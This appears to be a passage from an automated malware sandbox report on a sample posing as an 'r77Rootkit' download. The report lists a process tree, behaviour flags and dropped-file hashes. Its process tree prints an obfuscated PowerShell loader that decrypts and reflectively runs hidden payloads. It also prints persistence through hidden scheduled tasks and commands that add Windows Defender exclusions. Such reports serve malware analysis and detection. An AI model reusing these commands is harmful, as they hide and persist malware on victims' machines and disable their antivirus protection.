                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yGJQ1U19wiVWllygjZyIjUTZkEOzto1pLEDTlJtPyyA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h87rygcWYru3LHci/2RDwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sfZdw=New-Object System.IO.MemoryStream(,$param_var); $ZSiHU=New-Object System.IO.MemoryStream; $kiEkY=New-Object System.IO.Compression.GZipStream($sfZdw, [IO.Compression.CompressionMode]::Decompress); $kiEkY.CopyTo($ZSiHU); $kiEkY.Dispose(); $sfZdw.Dispose(); $ZSiHU.Dispose(); $ZSiHU.ToArray();}function execute_function($param_var,$param2_var){ $BOEro=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VHCNR=$BOEro.EntryPoint; $VHCNR.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\r77Rootkit 1.5.2\XClient.bat';$cgsdR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\r77Rootkit 1.5.2\XClient.bat').Split([Environment]::NewLine);foreach ($vfimk in $cgsdR) { if ($vfimk.StartsWith(':: ')) { $YVhEl=$vfimk.Substring(3); break; }}$payloads_var=[string[]]$YVhEl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                                                      3⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Modifies registry class
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:5848
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_469_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_469.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                                        4⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:5988
                                                                                                                      • C:\Windows\System32\WScript.exe
                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_469.vbs"
                                                                                                                        4⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        PID:5276
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_469.bat" "
                                                                                                                          5⤵
                                                                                                                            PID:5368
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              6⤵
                                                                                                                                PID:4152
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yGJQ1U19wiVWllygjZyIjUTZkEOzto1pLEDTlJtPyyA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h87rygcWYru3LHci/2RDwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sfZdw=New-Object System.IO.MemoryStream(,$param_var); $ZSiHU=New-Object System.IO.MemoryStream; $kiEkY=New-Object System.IO.Compression.GZipStream($sfZdw, [IO.Compression.CompressionMode]::Decompress); $kiEkY.CopyTo($ZSiHU); $kiEkY.Dispose(); $sfZdw.Dispose(); $ZSiHU.Dispose(); $ZSiHU.ToArray();}function execute_function($param_var,$param2_var){ $BOEro=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VHCNR=$BOEro.EntryPoint; $VHCNR.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_469.bat';$cgsdR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_469.bat').Split([Environment]::NewLine);foreach ($vfimk in $cgsdR) { if ($vfimk.StartsWith(':: ')) { $YVhEl=$vfimk.Substring(3); break; }}$payloads_var=[string[]]$YVhEl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                                                                6⤵
                                                                                                                                • Blocklisted process makes network request
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • Drops startup file
                                                                                                                                • Adds Run key to start application
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:5428
                                                                                                                                • C:\Users\Admin\Downloads\r77Rootkit 1.5.2\Install.exe
                                                                                                                                  "C:\Users\Admin\Downloads\r77Rootkit 1.5.2\Install.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5464
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                                                                  7⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:5844
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    8⤵
                                                                                                                                      PID:5920
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                                                                    7⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:5600
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      8⤵
                                                                                                                                        PID:5472
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\System.exe'
                                                                                                                                      7⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:3440
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        8⤵
                                                                                                                                          PID:5684
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
                                                                                                                                        7⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:3620
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          8⤵
                                                                                                                                            PID:5896
                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Public\System.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:5440
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            8⤵
                                                                                                                                              PID:5860
                                                                                                                                • C:\Users\Admin\Downloads\r77Rootkit 1.5.2\TestConsole.exe
                                                                                                                                  "C:\Users\Admin\Downloads\r77Rootkit 1.5.2\TestConsole.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:2024
                                                                                                                                • C:\Windows\regedit.exe
                                                                                                                                  "C:\Windows\regedit.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Runs regedit.exe
                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                  PID:3820
                                                                                                                                • C:\Users\Admin\Downloads\r77Rootkit 1.5.2\$77-Example.exe
                                                                                                                                  "C:\Users\Admin\Downloads\r77Rootkit 1.5.2\$77-Example.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:5912
                                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                                  "C:\Windows\system32\taskmgr.exe" /7
                                                                                                                                  2⤵
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:5272
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                1⤵
                                                                                                                                  PID:3520
                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                  1⤵
                                                                                                                                    PID:3704
                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of UnmapMainImage
                                                                                                                                    PID:3864
                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:3828
                                                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:4628
                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                      1⤵
                                                                                                                                        PID:4968
                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:1600
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                          1⤵
                                                                                                                                            PID:2932
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                            1⤵
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:988
                                                                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                            1⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:4272
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                            1⤵
                                                                                                                                              PID:2984
                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                              1⤵
                                                                                                                                                PID:4680
                                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of UnmapMainImage
                                                                                                                                                PID:3088
                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:5064
                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:464
                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4824
                                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3608
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2656
                                                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:5068
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4872
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:992
                                                                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1064
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5040
                                                                                                                                                                • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                  C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4624
                                                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5380
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5748
                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:544
                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5184
                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:2224
                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5112
                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4060

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  328B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  f54722d4a477aa556b1b5aa6d5a30919

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e676d232e09780a2c2377ea6dc40a6644fec07eb

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8cf3641b9e3a6eb85e03fe17d7e0148f3deb68a8edadc8d57b93678552fc9a10

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0dfe128642acc2071dc705ff9b12c165ab22edb9f5cce6ae2483f539431fbf1d6a78fb0051d6ca7d0dc06342247280dd0846bd10ebab52ee33af87d23f4211a4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  3f01549ee3e4c18244797530b588dad9

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3e87863fc06995fe4b741357c68931221d6cc0b9

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  661739d384d9dfd807a089721202900b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  152B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4f7152bc5a1a715ef481e37d1c791959

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  152B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  ea98e583ad99df195d29aa066204ab56

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f89398664af0179641aa0138b337097b617cb2db

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  72B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1f15897ed14bacd0d5b9daf85209cd6f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  2d1f57d983e81f12bb6393d9ad6ab93cc7760a5b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  594cff873e203f6044fad6a58a258658bca505b8cf1991a49c44700e7ca499b9

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  2116866d07a44705c150f8c9fcb9e402a3f86242e7c28403bc2da17c8c9528580e372c9300f43447a6cdec63105be949533ab2fa6186b201fdc86ec9456fa21a

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  46295cac801e5d4857d09837238a6394

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  188B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  008114e1a1a614b35e8a7515da0f3783

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3c390d38126c7328a8d7e4a72d5848ac9f96549b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a202fc891eace003c346bad7e5d2c73dadf9591d5ce950395ff4b63cc2866b17e02bd3f0ad92749df033a936685851455bcdbfad30f26e765c3c89d3309cb82b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e1f284343c1fea1ba6c3d001405787ad

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c2827865890306505aa7b66fd4ac922365132a40

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  79aeb5aca3e93e522a24e87b212b00ece99c76dda40d548e91031b4e8aefcce2

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f847dd7fdb63c66c0ced343539a056ca2fb94156fd43596f3a158b781d08b681149147f172f2f83867676104d50728341688bc626f64e5d465d352cd73ca4d2d

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1c2e56933d737b52088a38ca6dacab2a

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4bb8b62fde8272f8947c1de71176c8f1a8281ef8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0144543c3bddb330f6dc3fd19993f0253fdaeac15b5363d00a89e6bd0e6a7074

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e027e7940529b137761cc97235a017aab92264fa0e9d81e224db70c6c78a2e2ce571324d4578d4be27c422dad87a28f5a7809261f44a3b8724bceb407fb4477d

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1edd09f3c2be4c37490397851caa4df0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1d627aded1a3d4a01d62a0dce711f79872ce5c7a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  458d1ae9fdc974f44d76c6d3c8ba13e6e48804593ce9f6fde9113a4392cb0134

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5e0162d307e9fdda8544ba792655131fcc850c7f3afd615363b94f81c459a0d0f3509fa953bde63af6571ca95cc0b0e4193019f2ad326e1330f0acdd006d0b08

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  41B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  72B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  71d86832c9d734f37719d1560c6335b8

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  bd5107f3dc69b72e38f90f0a9c8c60e680ff17e9

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  925328bf2d0043a61d50311991303cdf21a7a89222de4981472f3089c3e6901a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9c0d61af30845dd58e02c5e7c2832fd0fcf3138efc16880005e77997569d9cb31bdeb2371cb8609cf46ef005bf02a5b4101bd7efed16f45c3a5ba9c64c89aab6

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5791a1.TMP

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  48B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b723444251b910953cab6cbf184474b6

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  dc16b291e91449d1b90439388f79c82fbcf4c996

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  74dc447c8d4141edd22791a95d5f8c35eed7370d15e1431b9bf8de5df6beeb09

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  94787c6ee65739fb5693689ff62fe7da91b5e9efae0073b2baf9ad1b88c0ca30b13d592dc0a48267eb6fe8317a203c80131fb5192fd67081ccbeb8ee834c8cb5

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

